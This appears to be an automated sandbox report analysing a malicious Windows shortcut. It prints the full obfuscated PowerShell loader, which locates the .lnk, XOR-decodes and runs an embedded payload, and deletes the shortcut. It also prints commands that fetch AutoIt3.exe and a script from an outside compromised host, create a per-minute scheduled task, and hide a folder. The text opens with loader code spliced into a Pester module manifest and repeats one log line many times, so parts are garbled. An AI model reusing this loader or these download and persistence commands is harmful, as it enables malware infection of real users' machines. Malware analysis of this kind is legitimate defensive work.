vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'Sa
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: c:\users\user\desktop\knfv5ivjev.lnkJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3969Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4086Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5279
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1522
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeAPI coverage: 8.4 %
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeAPI coverage: 8.7 %
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep count: 3969 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 4086 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -6456360425798339s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep count: 5279 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 1522 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
    Source: GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
    Source: GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
    Source: GSlLzFnTov.exe, 0000000E.00000003.1503111107.0000022C409E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DEB8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF7F1DEB8E4
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DB1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,8_2_00007FF7F1DB1D84
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DEBA8C SetUnhandledExceptionFilter,8_2_00007FF7F1DEBA8C
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DEB8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF7F1DEB8E4
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DEAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF7F1DEAFA0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E9BA8C SetUnhandledExceptionFilter,12_2_00007FF700E9BA8C
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E9AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF700E9AFA0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E9B8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF700E9B8E4
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTovJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Jump to behavior
